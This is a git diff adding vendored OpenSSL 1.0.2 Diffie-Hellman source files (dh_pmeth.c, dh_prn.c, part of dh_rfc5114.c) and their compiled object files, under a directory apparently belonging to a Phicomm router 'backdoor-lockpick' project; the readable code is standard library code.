+            return -2;
+        dctx->prime_len = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_PARAMGEN_SUBPRIME_LEN:
+        if (dctx->use_dsa == 0)
+            return -2;
+        dctx->subprime_len = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_PARAMGEN_GENERATOR:
+        if (dctx->use_dsa)
+            return -2;
+        dctx->generator = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_PARAMGEN_TYPE:
+#ifdef OPENSSL_NO_DSA
+        if (p1 != 0)
+            return -2;
+#else
+        if (p1 < 0 || p1 > 2)
+            return -2;
+#endif
+        dctx->use_dsa = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_RFC5114:
+        if (p1 < 1 || p1 > 3)
+            return -2;
+        dctx->rfc5114_param = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_PEER_KEY:
+        /* Default behaviour is OK */
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_KDF_TYPE:
+        if (p1 == -2)
+            return dctx->kdf_type;
+        if (p1 != EVP_PKEY_DH_KDF_NONE && p1 != EVP_PKEY_DH_KDF_X9_42)
+            return -2;
+        dctx->kdf_type = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_KDF_MD:
+        dctx->kdf_md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_DH_KDF_MD:
+        *(const EVP_MD **)p2 = dctx->kdf_md;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_KDF_OUTLEN:
+        if (p1 <= 0)
+            return -2;
+        dctx->kdf_outlen = (size_t)p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_DH_KDF_OUTLEN:
+        *(int *)p2 = dctx->kdf_outlen;
+        return 1;
+
+    case EVP_PKEY_CTRL_DH_KDF_UKM:
+        if (dctx->kdf_ukm)
+            OPENSSL_free(dctx->kdf_ukm);
+        dctx->kdf_ukm = p2;
+        if (p2)
+            dctx->kdf_ukmlen = p1;
+        else
+            dctx->kdf_ukmlen = 0;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_DH_KDF_UKM:
+        *(unsigned char **)p2 = dctx->kdf_ukm;
+        return dctx->kdf_ukmlen;
+
+    case EVP_PKEY_CTRL_DH_KDF_OID:
+        if (dctx->kdf_oid)
+            ASN1_OBJECT_free(dctx->kdf_oid);
+        dctx->kdf_oid = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_DH_KDF_OID:
+        *(ASN1_OBJECT **)p2 = dctx->kdf_oid;
+        return 1;
+
+    default:
+        return -2;
+
+    }
+}
+
+static int pkey_dh_ctrl_str(EVP_PKEY_CTX *ctx,
+                            const char *type, const char *value)
+{
+    if (!strcmp(type, "dh_paramgen_prime_len")) {
+        int len;
+        len = atoi(value);
+        return EVP_PKEY_CTX_set_dh_paramgen_prime_len(ctx, len);
+    }
+    if (!strcmp(type, "dh_rfc5114")) {
+        DH_PKEY_CTX *dctx = ctx->data;
+        int len;
+        len = atoi(value);
+        if (len < 0 || len > 3)
+            return -2;
+        dctx->rfc5114_param = len;
+        return 1;
+    }
+    if (!strcmp(type, "dh_paramgen_generator")) {
+        int len;
+        len = atoi(value);
+        return EVP_PKEY_CTX_set_dh_paramgen_generator(ctx, len);
+    }
+    if (!strcmp(type, "dh_paramgen_subprime_len")) {
+        int len;
+        len = atoi(value);
+        return EVP_PKEY_CTX_set_dh_paramgen_subprime_len(ctx, len);
+    }
+    if (!strcmp(type, "dh_paramgen_type")) {
+        int typ;
+        typ = atoi(value);
+        return EVP_PKEY_CTX_set_dh_paramgen_type(ctx, typ);
+    }
+    return -2;
+}
+
+#ifndef OPENSSL_NO_DSA
+
+extern int dsa_builtin_paramgen(DSA *ret, size_t bits, size_t qbits,
+                                const EVP_MD *evpmd,
+                                const unsigned char *seed_in, size_t seed_len,
+                                unsigned char *seed_out, int *counter_ret,
+                                unsigned long *h_ret, BN_GENCB *cb);
+
+extern int dsa_builtin_paramgen2(DSA *ret, size_t L, size_t N,
+                                 const EVP_MD *evpmd,
+                                 const unsigned char *seed_in,
+                                 size_t seed_len, int idx,
+                                 unsigned char *seed_out, int *counter_ret,
+                                 unsigned long *h_ret, BN_GENCB *cb);
+
+static DSA *dsa_dh_generate(DH_PKEY_CTX *dctx, BN_GENCB *pcb)
+{
+    DSA *ret;
+    int rv = 0;
+    int prime_len = dctx->prime_len;
+    int subprime_len = dctx->subprime_len;
+    const EVP_MD *md = dctx->md;
+    if (dctx->use_dsa > 2)
+        return NULL;
+    ret = DSA_new();
+    if (!ret)
+        return NULL;
+    if (subprime_len == -1) {
+        if (prime_len >= 2048)
+            subprime_len = 256;
+        else
+            subprime_len = 160;
+    }
+    if (md == NULL) {
+        if (prime_len >= 2048)
+            md = EVP_sha256();
+        else
+            md = EVP_sha1();
+    }
+    if (dctx->use_dsa == 1)
+        rv = dsa_builtin_paramgen(ret, prime_len, subprime_len, md,
+                                  NULL, 0, NULL, NULL, NULL, pcb);
+    else if (dctx->use_dsa == 2)
+        rv = dsa_builtin_paramgen2(ret, prime_len, subprime_len, md,
+                                   NULL, 0, -1, NULL, NULL, NULL, pcb);
+    if (rv <= 0) {
+        DSA_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+#endif
+
+static int pkey_dh_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    DH *dh = NULL;
+    DH_PKEY_CTX *dctx = ctx->data;
+    BN_GENCB *pcb, cb;
+    int ret;
+    if (dctx->rfc5114_param) {
+        switch (dctx->rfc5114_param) {
+        case 1:
+            dh = DH_get_1024_160();
+            break;
+
+        case 2:
+            dh = DH_get_2048_224();
+            break;
+
+        case 3:
+            dh = DH_get_2048_256();
+            break;
+
+        default:
+            return -2;
+        }
+        EVP_PKEY_assign(pkey, EVP_PKEY_DHX, dh);
+        return 1;
+    }
+
+    if (ctx->pkey_gencb) {
+        pcb = &cb;
+        evp_pkey_set_cb_translate(pcb, ctx);
+    } else
+        pcb = NULL;
+#ifndef OPENSSL_NO_DSA
+    if (dctx->use_dsa) {
+        DSA *dsa_dh;
+        dsa_dh = dsa_dh_generate(dctx, pcb);
+        if (!dsa_dh)
+            return 0;
+        dh = DSA_dup_DH(dsa_dh);
+        DSA_free(dsa_dh);
+        if (!dh)
+            return 0;
+        EVP_PKEY_assign(pkey, EVP_PKEY_DHX, dh);
+        return 1;
+    }
+#endif
+    dh = DH_new();
+    if (!dh)
+        return 0;
+    ret = DH_generate_parameters_ex(dh,
+                                    dctx->prime_len, dctx->generator, pcb);
+
+    if (ret)
+        EVP_PKEY_assign_DH(pkey, dh);
+    else
+        DH_free(dh);
+    return ret;
+}
+
+static int pkey_dh_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    DH *dh = NULL;
+    if (ctx->pkey == NULL) {
+        DHerr(DH_F_PKEY_DH_KEYGEN, DH_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    dh = DH_new();
+    if (!dh)
+        return 0;
+    EVP_PKEY_assign(pkey, ctx->pmeth->pkey_id, dh);
+    /* Note: if error return, pkey is freed by parent routine */
+    if (!EVP_PKEY_copy_parameters(pkey, ctx->pkey))
+        return 0;
+    return DH_generate_key(pkey->pkey.dh);
+}
+
+static int pkey_dh_derive(EVP_PKEY_CTX *ctx, unsigned char *key,
+                          size_t *keylen)
+{
+    int ret;
+    DH *dh;
+    DH_PKEY_CTX *dctx = ctx->data;
+    BIGNUM *dhpub;
+    if (!ctx->pkey || !ctx->peerkey) {
+        DHerr(DH_F_PKEY_DH_DERIVE, DH_R_KEYS_NOT_SET);
+        return 0;
+    }
+    dh = ctx->pkey->pkey.dh;
+    dhpub = ctx->peerkey->pkey.dh->pub_key;
+    if (dctx->kdf_type == EVP_PKEY_DH_KDF_NONE) {
+        if (key == NULL) {
+            *keylen = DH_size(dh);
+            return 1;
+        }
+        ret = DH_compute_key(key, dhpub, dh);
+        if (ret < 0)
+            return ret;
+        *keylen = ret;
+        return 1;
+    } else if (dctx->kdf_type == EVP_PKEY_DH_KDF_X9_42) {
+        unsigned char *Z = NULL;
+        size_t Zlen = 0;
+        if (!dctx->kdf_outlen || !dctx->kdf_oid)
+            return 0;
+        if (key == NULL) {
+            *keylen = dctx->kdf_outlen;
+            return 1;
+        }
+        if (*keylen != dctx->kdf_outlen)
+            return 0;
+        ret = 0;
+        Zlen = DH_size(dh);
+        Z = OPENSSL_malloc(Zlen);
+        if (DH_compute_key_padded(Z, dhpub, dh) <= 0)
+            goto err;
+        if (!DH_KDF_X9_42(key, *keylen, Z, Zlen, dctx->kdf_oid,
+                          dctx->kdf_ukm, dctx->kdf_ukmlen, dctx->kdf_md))
+            goto err;
+        *keylen = dctx->kdf_outlen;
+        ret = 1;
+ err:
+        if (Z) {
+            OPENSSL_cleanse(Z, Zlen);
+            OPENSSL_free(Z);
+        }
+        return ret;
+    }
+    return 1;
+}
+
+const EVP_PKEY_METHOD dh_pkey_meth = {
+    EVP_PKEY_DH,
+    0,
+    pkey_dh_init,
+    pkey_dh_copy,
+    pkey_dh_cleanup,
+
+    0,
+    pkey_dh_paramgen,
+
+    0,
+    pkey_dh_keygen,
+
+    0,
+    0,
+
+    0,
+    0,
+
+    0, 0,
+
+    0, 0, 0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0,
+    pkey_dh_derive,
+
+    pkey_dh_ctrl,
+    pkey_dh_ctrl_str
+};
+
+const EVP_PKEY_METHOD dhx_pkey_meth = {
+    EVP_PKEY_DHX,
+    0,
+    pkey_dh_init,
+    pkey_dh_copy,
+    pkey_dh_cleanup,
+
+    0,
+    pkey_dh_paramgen,
+
+    0,
+    pkey_dh_keygen,
+
+    0,
+    0,
+
+    0,
+    0,
+
+    0, 0,
+
+    0, 0, 0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0,
+    pkey_dh_derive,
+
+    pkey_dh_ctrl,
+    pkey_dh_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_pmeth.o
new file mode 100644
index 0000000000000000000000000000000000000000..eb37981616e27d54161e0456f1cecd6e8fdbbcef
GIT binary patch
literal 9016
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
CYp-Yk

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.c
new file mode 100644
index 0000000..5d6c3a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.c
@@ -0,0 +1,79 @@
+/* crypto/asn1/t_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/dh.h>
+
+#ifndef OPENSSL_NO_FP_API
+int DHparams_print_fp(FILE *fp, const DH *x)
+{
+    BIO *b;
+    int ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        DHerr(DH_F_DHPARAMS_PRINT_FP, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = DHparams_print(b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..a0d0165846e861bedebbd1d7d486c0cfde9dced9
GIT binary patch
literal 1968
zcmbW1Pixdr5Wr_Q)mClORXh|bWly5ihD{Zu1!c2swp&@Ov|SKv3E6G7t=-LrB#W&F
zJt+hfdh~mE^H2*a;?)lzJ&0616w#9?b>`*0Hchja4oqg|_ujle^WMu-y<AMEQXnJ+
zx8X1n6u{{^^z+QkLm%|Qul}JwT4g%;r_E0Xzbm`cR0=+Z_StrONLRPjPj9*rZ&~<x
zdkR0g`jvI~F<c5hl!Nc;=dFj4ymIiZ6zuV#_O#$Vb0>qHMQuS_d<Rn#6XV${m1^7e
z+u1SYx{@1FZ?;*eJ{ip^xf@qQjAPQWGpID})ZGfC0k(-rs3aFd1F6TekXp~A279}E
zHn9NLkYD0$9@(Otd70Mbffv%GoPFMvHspbVoGHjXyi*55wd{hQ`$^4GVx?(qVs%He
zB(|HQj3Nn6ABT)n*^i3^$%~d)m5%m5i{XXHI$14{QEjNMaT!IB#BX)rdIvt&fiHC6
zYaKW&tr(7LD>axbIi_niJq%ZE->5raOqFK}TG^N>7U%SNV_qwibps01Glpl>R~r^{
zZR-)}v$KZN_6^H*TP~wD-)+Q3WW4TLbjuHGKzHpN>filP2B;B*crU8pV+2u%_n``Y
zk01(h8CCEH1W}0hqY7Rph(essLGUd4BzXUsvVcB{x6$;?Dq7zS?TYYRt6?g>weEwm
zWcns3RnG&Z)@n8_8=2kmEd}4yi07NNH6Ab9ZN+h0j^+9rps*3F6{C)Y59@L;?+KkO
z=Fyvq-}pQ-5^+DnDC{eIvV*8pn>=b%?(-+N$syf)nn%18ac-A6kH65@JTGo&jHu9m
zg~mK-zKXdtW)3wfV*cSML|@D=?0AGlyMBoV5ntp9bO#;!tI$1)$_@{*QHZ{%pTJdg
zXv}!NSZGOf<Tjqah&<{1c6mX?Innu1uE-ZWac=Ba;v0R%Exp+@3Hik0XNL%O_=bE6
YBEp9|Am`Cb%4eIxw#Grv(23{&2h85j`Tzg`

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.c
new file mode 100644
index 0000000..e96e2aa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_rfc5114.c
@@ -0,0 +1,285 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2011.
+ */
+/* ====================================================================
+ * Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/dh.h>
+#include <openssl/bn.h>
+
+/* DH parameters from RFC5114 */
+
+#if BN_BITS2 == 64
+static const BN_ULONG dh1024_160_p[] = {
+    0xDF1FB2BC2E4A4371ULL, 0xE68CFDA76D4DA708ULL, 0x45BF37DF365C1A65ULL,
+    0xA151AF5F0DC8B4BDULL, 0xFAA31A4FF55BCCC0ULL, 0x4EFFD6FAE5644738ULL,
+    0x98488E9C219A7372ULL, 0xACCBDD7D90C4BD70ULL, 0x24975C3CD49B83BFULL,
+    0x13ECB4AEA9061123ULL, 0x9838EF1E2EE652C0ULL, 0x6073E28675A23D18ULL,
+    0x9A6A9DCA52D23B61ULL, 0x52C99FBCFB06A3C6ULL, 0xDE92DE5EAE5D54ECULL,
+    0xB10B8F96A080E01DULL
+};
+
+static const BN_ULONG dh1024_160_g[] = {
+    0x855E6EEB22B3B2E5ULL, 0x858F4DCEF97C2A24ULL, 0x2D779D5918D08BC8ULL,
+    0xD662A4D18E73AFA3ULL, 0x1DBF0A0169B6A28AULL, 0xA6A24C087A091F53ULL,
+    0x909D0D2263F80A76ULL, 0xD7FBD7D3B9A92EE1ULL, 0x5E91547F9E2749F4ULL,
+    0x160217B4B01B886AULL, 0x777E690F5504F213ULL, 0x266FEA1E5C41564BULL,
+    0xD6406CFF14266D31ULL, 0xF8104DD258AC507FULL, 0x6765A442EFB99905ULL,
+    0xA4D1CBD5C3FD3412ULL
+};
+
+static const BN_ULONG dh1024_160_q[] = {
+    0x64B7CB9D49462353ULL, 0x81A8DF278ABA4E7DULL, 0x00000000F518AA87ULL
+};
+
